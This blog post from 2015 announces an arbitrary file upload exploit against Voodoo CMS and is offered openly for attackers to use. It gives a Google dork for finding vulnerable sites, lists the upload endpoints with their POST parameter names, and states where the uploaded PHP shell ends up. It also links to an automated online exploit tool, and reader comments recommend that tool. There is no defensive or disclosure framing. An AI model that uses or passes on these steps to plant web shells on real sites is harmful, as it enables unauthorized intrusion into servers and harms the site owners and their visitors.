Sunday, 13 September 2015

Voodoo CMS Arbitrary File Upload Xploit

########################################
Date Published : 12/09/2015
Exploit Author : Mr. Error 404 | IndoXploit Coders Team
Tested on : Windows XP
#########################################

Google Dork : intext:"DiseƱo y Desarrollo PVS Interactive"
and Use ur brain :p
___________________________________________________



Affected URL : 
-www.target.com//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//uploader.php (post: qqfile)
OR
-www.target.com//[PATH_CMS]//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com//[PATH_CMS]/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//[PATH_CMS]//uploader.php (post: qqfile)

Shell Akses: - target/voodoo-admin/files_tmp/[angka_random].php

Tools 0day Xploit => http://indoxploit.org/tools/?tools=vdocms
Input target : http://www.target.com/

Join : https://www.facebook.com/groups/indoxploitpublic/

4 comments:

  1. Replies
    1. pake autonya aja mas http://indoxploit.org/tools/?tools=vdocms

      Delete
    2. pake csrf online juga bisa gan hehe

      Delete